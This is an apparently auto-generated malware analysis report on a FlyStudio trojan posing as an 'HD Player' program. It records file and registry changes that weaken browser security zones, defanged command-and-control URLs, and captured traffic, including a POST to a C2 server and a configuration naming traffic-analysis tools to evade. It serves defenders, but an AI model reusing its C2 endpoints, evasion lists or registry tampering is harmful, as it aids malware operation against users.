Trojan.Win32.FlyStudio_b80a2f4686

by malwarelabrobot on June 28th, 2016 in Malware Descriptions.

Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: b80a2f4686db379c5b6d6b9bb1918398
SHA1: e4094f15ace99750f9106d735fcd169b28bddab3
SHA256: 75b77838f3d9171aa916e91c795af1992e223539f65059d08eb765cbb0f8282b
SSDeep: 49152:pp0qBMZErfDxfZNEMfO7InlG4LKUXWGeRcJI9:DhB2ErfDxTxG7InlG4LKUXHi9
Size: 3104768 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC50, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2016-06-08 17:13:09
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):

attrib.exe:1888

The Trojan injects its code into the following process(es):

%original file name%.exe:464

Mutexes

The following mutexes were created/opened:

AMResourceMutex2
ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (791 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (162 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (391 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (678 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (234 bytes)
%WinDir%\system\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (11952 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\now_set[1].htm (2413 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (309 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)

Registry activity

The process attrib.exe:1888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A EE 5D 50 78 40 20 DA 1B CB 09 DF 3D 7C 7B 6A"

The process %original file name%.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 86 BE 03 ED 07 DA 08 F5 33 F2 95 18 11 2C A3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
7283299a80a0bcdd07ddb32efa4d0c2c c:\WINDOWS\system\exdui.dll
7283299a80a0bcdd07ddb32efa4d0c2c c:\exdui.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: needModify
Product Name: HD Player
Product Version: 7.5.1.0
Legal Copyright: needModify ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 7.5.1.0
File Description:
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 2152730 2154496 4.34584 c08e7e4aa1b3a82cdcf0de4da8e7559f
.rdata 2158592 469424 471040 4.88172 68c2f9d22dec2394ee6d9fb642650355
.data 2629632 364017 90112 3.53042 4f71eab1b0d8896c3e3e7bdcfbe32c91
.rsrc 2994176 383680 385024 1.55761 719b7d6c28d47e98dacbebe7b82c4eff

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://1.musql.sinaapp.com/tool/get_date.php 220.181.136.27
hxxp://duapp.n.shifen.com/music/url.txt
hxxp://1.musql.sinaapp.com/now_set.php 220.181.136.27
hxxp://56063.vhost18.boxcdn.cn/aaafz_now.asp 116.255.151.25
hxxp://opencdn.jomodns.com/data2/music/6014329382/begin.mp3?xcode=44eee67d7da4c0dffcb4a0d00e046e26805971f83b18ba2f
hxxp://www.a.shifen.com/s?wd=AAA266314320305272344325250273372
hxxp://www.a.shifen.com/s?wd=AAA266314320305272344325250
hxxp://so.qh-lb.com/s?q=aaa短信轰炸机
hxxp://so.seos-lb.com/s?q=aaa短信轰炸机
hxxp://so.qh-lb.com/s?q=aaa短信轰炸
hxxp://so.seos-lb.com/s?q=aaa短信轰炸
hxxp://www.a.shifen.com/s?wd=www.aaazha.com
hxxp://www.haosou.com/s?q=aaa短信轰炸机 101.226.161.132
hxxp://aaafzcloud.duapp.com/music/url.txt 220.181.7.172
hxxp://www.so.com/s?q=aaa短信轰炸 106.120.160.134
hxxp://www.baidu.com/s?wd=www.aaazha.com
hxxp://www.haosou.com/s?q=aaa短信轰炸 101.226.161.132
hxxp://www.baidu.com/s?wd=AAA..........
hxxp://yunshiting.baidu.com/data2/music/6014329382/begin.mp3?xcode=44eee67d7da4c0dffcb4a0d00e046e26805971f83b18ba2f 59.38.112.35
hxxp://www.so.com/s?q=aaa短信轰炸机 106.120.160.134
hxxp://www.baidu.com/s?wd=AAA........
www.sogou.com 106.38.241.37


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /s?q=aaa短信轰炸 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.haosou.com
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Mon, 27 Jun 2016 17:23:12 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.so.com/s?q=aaa短信轰炸
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx</center>..</body>..</html>....



GET /data2/music/6014329382/begin.mp3?xcode=44eee67d7da4c0dffcb4a0d00e046e26805971f83b18ba2f HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yunshiting.baidu.com
Connection: Keep-Alive


HTTP/1.1 401 Unauthorized
Server: JSP3/2.0.14
Date: Mon, 27 Jun 2016 17:22:47 GMT
Content-Type: text/html
Content-Length: 596
Connection: keep-alive
<html>..<head><title>401 Authorization Required</
title></head>..<body bgcolor="white">..<center>&l
t;h1>401 Authorization Required</h1></center>..<hr&g
t;<center>JSP3/2.0.14</center>..</body>..</html&g
t;..<!-- a padding to disable MSIE and Chrome friendly error page -
->..<!-- a padding to disable MSIE and Chrome friendly error pag
e -->..<!-- a padding to disable MSIE and Chrome friendly error 
page -->..<!-- a padding to disable MSIE and Chrome friendly err
or page -->..<!-- a padding to disable MSIE and Chrome friendly 
error page -->..<!-- a padding to disable MSIE and Chrome friend
ly error page -->..HTTP/1.1 401 Unauthorized..Server: JSP3/2.0.14..
Date: Mon, 27 Jun 2016 17:22:47 GMT..Content-Type: text/html..Content-
Length: 596..Connection: keep-alive..<html>..<head><tit
le>401 Authorization Required</title></head>..<body 
bgcolor="white">..<center><h1>401 Authorization Require
d</h1></center>..<hr><center>JSP3/2.0.14</c
enter>..</body>..</html>..<!-- a padding to disable 
MSIE and Chrome friendly error page -->..<!-- a padding to disab
le MSIE and Chrome friendly error page -->..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
 disable MSIE and Chrome friendly error page -->..<!-- a padding
 to disable MSIE and Chrome friendly error page -->..<!-- a 
<<< skipped >>>


GET /aaafz_now.asp HTTP/1.1
Accept: */*
Referer: hXXp://56063.vhost18.boxcdn.cn/aaafz_now.asp
Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Host: 56063.vhost18.boxcdn.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 113
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSACCQDAA=OMACGOKAEOLAIOMPKJPOJHOF; path=/
Server: IIS
X-Powered-By: WAF/2.0
Set-Cookie: safedog-flow-item=4C893C1B4B31C20B5DCD4F31D2F18866; expires=Tue, 28-Jun-2016 15:59:43 GMT; domain=boxcdn.cn; path=/
Date: Mon, 27 Jun 2016 17:22:42 GMT
 ..[now]_3042[now]..[text]_now_wai1t[text][sms]..,..................,.
.............30....![sms][title]....[title]HTTP/1.1 200 OK..Cache-Cont
rol: private..Content-Length: 113..Content-Type: text/html..Set-Cookie
: ASPSESSIONIDSACCQDAA=OMACGOKAEOLAIOMPKJPOJHOF; path=/..Server: IIS..
X-Powered-By: WAF/2.0..Set-Cookie: safedog-flow-item=4C893C1B4B31C20B5
DCD4F31D2F18866; expires=Tue, 28-Jun-2016 15:59:43 GMT; domain=boxcdn.
cn; path=/..Date: Mon, 27 Jun 2016 17:22:42 GMT.. ..[now]_3042[now]..[
text]_now_wai1t[text][sms]..,..................,..............30....![
sms][title]....[title]..



GET /s?q=aaa短信轰炸机 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.so.com
Cache-Control: no-cache
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: openresty
Date: Mon, 27 Jun 2016 17:23:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: QiHooGUID=AF0346B8A08C32AD86015371124D248C.1467048183492; expires=Wed, 27-Jun-2018 17:23:03 GMT; path=/
Set-Cookie: _S=7jntb5q67uu56url0cboef9g51; expires=Mon, 27-Jun-2016 17:33:03 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tso_Anoyid=11146704818319424268; expires=Wed, 27-Jun-2018 17:23:03 GMT; path=/
5fd8..<!DOCTYPE html>.<!--[if lt IE 7 ]><html class="ie
6"><![endif]-->.<!--[if IE 7 ]><html class="ie7">
<![endif]-->.<!--[if IE 8 ]><html class="ie8"><![
endif]-->.<!--[if IE 9 ]><html class="ie9"><![endif]
-->.<!--[if (gt IE 9)|!(IE)]><!--><html><!--&l
t;![endif]-->.<head>.<meta charset="utf-8">.<meta co
ntent="always" name="referrer">.<meta http-equiv="X-UA-Compatibl
e" content="IE=edge,chrome=1">.<title>aaa..............._360.
.....</title>.<link rel="dns-prefetch" href="//s0.qhimg.com"&
gt;.<link rel="dns-prefetch" href="//s1.qhimg.com">.<link rel
="dns-prefetch" href="//p0.qhimg.com">.<link rel="dns-prefetch" 
href="//p1.qhimg.com">.<link rel="shortcut icon" href="hXXp://s0
.qhimg.com/static/52166db8c450f68d.ico" type="image/x-icon">.<li
nk rel="search" type="application/opensearchdescription xml" href="htt
ps://VVV.so.com/soopensearch.xml" title="360....HTTP/1.1 200 OK..Serve
r: openresty..Date: Mon, 27 Jun 2016 17:23:03 GMT..Content-Type: text/
html..Transfer-Encoding: chunked..Connection: close..Vary: Accept-Enco
ding..Set-Cookie: QiHooGUID=AF0346B8A08C32AD86015371124D248C.146704818
3492; expires=Wed, 27-Jun-2018 17:23:03 GMT; path=/..Set-Cookie: _S=7j
ntb5q67uu56url0cboef9g51; expires=Mon, 27-Jun-2016 17:33:03 GMT; path=
/..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, no
-cache, must-revalidate, post-check=0, pre-check=0..Pragma: no-cac
<<< skipped >>>


GET /s?q=aaa短信轰炸机 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.haosou.com
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Mon, 27 Jun 2016 17:22:59 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.so.com/s?q=aaa短信轰炸机
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx</center>..</body>..</html>....



GET /s?wd=AAA.......... HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.baidu.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 27 Jun 2016 17:22:49 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Set-Cookie: BAIDUID=5C55CF7E33B2F22B2B44E6E9B323E927:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BIDUPSID=5C55CF7E33B2F22B2B44E6E9B323E927; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: PSTM=1467048168; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BD_CK_SAM=1;path=/
Set-Cookie: BDSVRTM=147; path=/
Set-Cookie: H_PS_PSSID=20181_1449_20318_18240_17947_20388_19690_14981_11673; path=/; domain=.baidu.com
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Cache-Control: private
Cxy_all: baidu db57f935ce81df23cda6d514358875ec
Cxy_ex: 1467048169 3663786690 d41d8cd98f00b204e9800998ecf8427e
X-Powered-By: HPHP
Server: BWS/1.1
X-UA-Compatible: IE=Edge,chrome=1
BDPAGETYPE: 3
BDQID: 0x96d839aa00022764
BDUSERID: 0
423e..<!DOCTYPE html><!--STATUS OK--><html><head&
gt;<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
;<meta http-equiv="content-type" content="text/html;charset=utf-8"&
gt;<meta content="always" name="referrer"><meta name="theme-c
olor" content="#2932e1"><link rel="shortcut icon" href="/favicon
.ico" type="image/x-icon" /><link rel="icon" sizes="any" mask hr
ef="//VVV.baidu.com/img/baidu.svg"><link rel="search" type="appl
ication/opensearchdescription xml" href="/content-search.xml" title=".
..........." /><title>AAA..............._............</tit
le><style data-for="result"  id="css_newi_result">body{color:
#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-wi
dth:900px}body,th,td,.p1,.p2{font-family:arial}p,form,ol,ul,li,dl,dt,d
d,h3{margin:0;padding:0;list-style:none}input{padding-top:0;padding-bo
ttom:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-si
zing:border-box}table,img{border:0}td{font-size:9pt;line-height:18px}e
m{font-style:normal;color:#c00}a em{text-decoration:underline}cite{fon
t-style:normal;color:#008000}.m,a.m{color:#666}a.m:visited{color:#606}
.g,a.g{color:#008000}.c{color:#77c}.f14{font-size:14px}.f10{font-size:
10.5pt}.f16{font-size:16px}.f13{font-size:13px}.bg{background-image:ur
l(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_0e814c16.
png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdsta
tic.com/r/www/cache/static/global/img/icons_5c448026.gif);backgrou
<<< skipped >>>

GET /s?wd=AAA........ HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.baidu.com
Cache-Control: no-cache
Cookie: BAIDUID=5C55CF7E33B2F22B2B44E6E9B323E927:FG=1; BIDUPSID=5C55CF7E33B2F22B2B44E6E9B323E927; PSTM=1467048168; H_PS_PSSID=20181_1449_20318_18240_17947_20388_19690_14981_11673; BD_CK_SAM=1; BDSVRTM=147


HTTP/1.1 200 OK
Date: Mon, 27 Jun 2016 17:22:51 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu c35c8362936a1e9b9cfe835d90f974c0
Cxy_ex: 1467048171 3663786690 d4488661a98041505f35efc95ebea9bd
X-Powered-By: HPHP
Server: BWS/1.1
X-UA-Compatible: IE=Edge,chrome=1
BDPAGETYPE: 3
BDQID: 0xbe49be350001fa30
BDUSERID: 0
Set-Cookie: BD_CK_SAM=1;path=/
Set-Cookie: BDSVRTM=118; path=/
Set-Cookie: H_PS_PSSID=20181_1449_20318_18240_17947_20388_19690_14981_11673; path=/; domain=.baidu.com
45e..<!DOCTYPE html><!--STATUS OK--><html><head&g
t;<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta http-equiv="content-type" content="text/html;charset=utf-8"&g
t;<meta content="always" name="referrer"><meta name="theme-co
lor" content="#2932e1"><link rel="shortcut icon" href="/favicon.
ico" type="image/x-icon" /><link rel="icon" sizes="any" mask hre
f="//VVV.baidu.com/img/baidu.svg"><link rel="search" type="appli
cation/opensearchdescription xml" href="/content-search.xml" title="..
.........." /><title>AAA............_............</title&g
t;<style data-for="result"  id="css_newi_result">body{color:#333
;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:
900px}body,th,td,.p1,.p2{font-family:arial}p,form,ol,ul,li,dl,dt,dd,h3
{margin:0;padding:0;list-style:none}input{padding-top:0;padding-bottom
:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing
:border-box}table,img{border:0}td{font-size:9pt;line-height:18px}em{fo
nt-style:normal;color:#c00}a em{text-decoration:underline}cite{font-st
yle:normal;color:#008000}.m,a.m{color:#666}a.m:visited{color:#606}.g,a
.g{color:#008000}..1680...c{color:#77c}.f14{font-size:14px}.f10{font-s
ize:10.5pt}.f16{font-size:16px}.f13{font-size:13px}.bg{background-imag
e:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_0e814
c16.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.b
dstatic.com/r/www/cache/static/global/img/icons_5c448026.gif);back
<<< skipped >>>

GET /s?wd=VVV.aaazha.com HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.baidu.com
Cache-Control: no-cache
Cookie: BAIDUID=5C55CF7E33B2F22B2B44E6E9B323E927:FG=1; BIDUPSID=5C55CF7E33B2F22B2B44E6E9B323E927; PSTM=1467048168; H_PS_PSSID=20181_1449_20318_18240_17947_20388_19690_14981_11673; BD_CK_SAM=1; BDSVRTM=118


HTTP/1.1 200 OK
Date: Mon, 27 Jun 2016 17:23:14 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu ba2f273a726b89aa5ff1787079b928b0
Cxy_ex: 1467048194 3663786690 d4488661a98041505f35efc95ebea9bd
X-Powered-By: HPHP
Server: BWS/1.1
X-UA-Compatible: IE=Edge,chrome=1
BDPAGETYPE: 3
BDQID: 0xa61969c100020551
BDUSERID: 0
Set-Cookie: BD_CK_SAM=1;path=/
Set-Cookie: BDSVRTM=96; path=/
Set-Cookie: H_PS_PSSID=20181_1449_20318_18240_17947_20388_19690_14981_11673; path=/; domain=.baidu.com
423e..<!DOCTYPE html><!--STATUS OK--><html><head&
gt;<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
;<meta http-equiv="content-type" content="text/html;charset=utf-8"&
gt;<meta content="always" name="referrer"><meta name="theme-c
olor" content="#2932e1"><link rel="shortcut icon" href="/favicon
.ico" type="image/x-icon" /><link rel="icon" sizes="any" mask hr
ef="//VVV.baidu.com/img/baidu.svg"><link rel="search" type="appl
ication/opensearchdescription xml" href="/content-search.xml" title=".
..........." /><title>VVV.aaazha.com_............</title&g
t;<style data-for="result"  id="css_newi_result">body{color:#333
;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:
900px}body,th,td,.p1,.p2{font-family:arial}p,form,ol,ul,li,dl,dt,dd,h3
{margin:0;padding:0;list-style:none}input{padding-top:0;padding-bottom
:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing
:border-box}table,img{border:0}td{font-size:9pt;line-height:18px}em{fo
nt-style:normal;color:#c00}a em{text-decoration:underline}cite{font-st
yle:normal;color:#008000}.m,a.m{color:#666}a.m:visited{color:#606}.g,a
.g{color:#008000}.c{color:#77c}.f14{font-size:14px}.f10{font-size:10.5
pt}.f16{font-size:16px}.f13{font-size:13px}.bg{background-image:url(ht
tp://s1.bdstatic.com/r/www/cache/static/global/img/icons_0e814c16.png)
;background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.
com/r/www/cache/static/global/img/icons_5c448026.gif);background-r
<<< skipped >>>


GET /s?q=aaa短信轰炸 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.so.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: QiHooGUID=AF0346B8A08C32AD86015371124D248C.1467048183492; _S=7jntb5q67uu56url0cboef9g51; tso_Anoyid=11146704818319424268


HTTP/1.1 200 OK
Server: openresty
Date: Mon, 27 Jun 2016 17:23:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
5fb8..<!DOCTYPE html>.<!--[if lt IE 7 ]><html class="ie
6"><![endif]-->.<!--[if IE 7 ]><html class="ie7">
<![endif]-->.<!--[if IE 8 ]><html class="ie8"><![
endif]-->.<!--[if IE 9 ]><html class="ie9"><![endif]
-->.<!--[if (gt IE 9)|!(IE)]><!--><html><!--&l
t;![endif]-->.<head>.<meta charset="utf-8">.<meta co
ntent="always" name="referrer">.<meta http-equiv="X-UA-Compatibl
e" content="IE=edge,chrome=1">.<title>aaa............_360....
..</title>.<link rel="dns-prefetch" href="//s0.qhimg.com">
.<link rel="dns-prefetch" href="//s1.qhimg.com">.<link rel="d
ns-prefetch" href="//p0.qhimg.com">.<link rel="dns-prefetch" hre
f="//p1.qhimg.com">.<link rel="shortcut icon" href="hXXp://s0.qh
img.com/static/52166db8c450f68d.ico" type="image/x-icon">.<link 
rel="search" type="application/opensearchdescription xml" href="https:
//VVV.so.com/soopensearch.xml" title="360......">.<style type="t
ext/css">body{background:#fff;color:#333;min-width:1000px;position:
relative}body,th,td{font-family:arial}html,body,ul,ol,li,dl,dd,h1,h2,h
3,h4,h5,h6,pre,form,input,button,textarea,p,th,td{margin:0;padding:0}p
,form,ol,ul,li,h3,menu{list-style:none}table,img{border:0}img,object,s
elect,input,textarea,button{vertical-align:middle}th{text-align:left}h
1,h2,h3,h4,h5,h6,input,textarea,select,cite,em,i,b,strong,th{font-size
:100%;font-style:normal}ins,s,u,del{text-decoration:none}em,cite{f
<<< skipped >>>


POST /now_set.php HTTP/1.1
Accept: */*
Referer: hXXp://1.musql.sinaapp.com/now_set.php
Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Host: 1.musql.sinaapp.com
Content-Length: 198
Cache-Control: no-cache

sos=1&key_1=2692bae23b605083O3FZyX53&key_2=3234af4f0b20a7b2j1X8Yc01&ver=7.5&open=ooo750&act=&md_sta=4034861b32b1089a0eea7f55bca043db&time=2016-06-28 01:22:44&onlineF=6dc1659708de495d731b7015aff54add
HTTP/1.1 200 OK
Server: sae
Date: Mon, 27 Jun 2016 17:22:45 GMT
Content-Type: text/html; charset=uft-8
Transfer-Encoding: chunked
Connection: keep-alive
Via: 10.67.15.39
ad4..[s1]SOFTWARE\Now_warks\[s1][s2]%WinDir%\system\WINSPLEDX[s2][s3
]SOFTWARE\Now_warkO\[s3][s4]C:\Windows\show2.jpg[s4][s5]hXXp://56063.v
host18.boxcdn.cn/aaafz_now.asp[s5][s6]600000[s6][b1]%WinDir%\system\
JspXmlFora.txt[b1][s14]SmartSniff|Fiddler|...............|Wireshark|Ch
arles|WinSock Expert|Ethereal|HttpWatch|HTTP Analyzer|HTTP Debugger|HT
TPLook|............|............[s14][s15]999999999[s15][s17]C:\Window
s\System\background_image.jpg[s17][s19]hXXp://VVV.aaazha.com/page/stud
y/teaManager.html[s19][F1]24,1A,D7,4B,63,5D,95,8F,37,17,96,A6,77,33,BA
,C2,[F1][F2]d2VibWFzdGVyQEhLNzE4MDk=[F2][F3]dsll=207[F3][F4]/WEB/D_Jk/
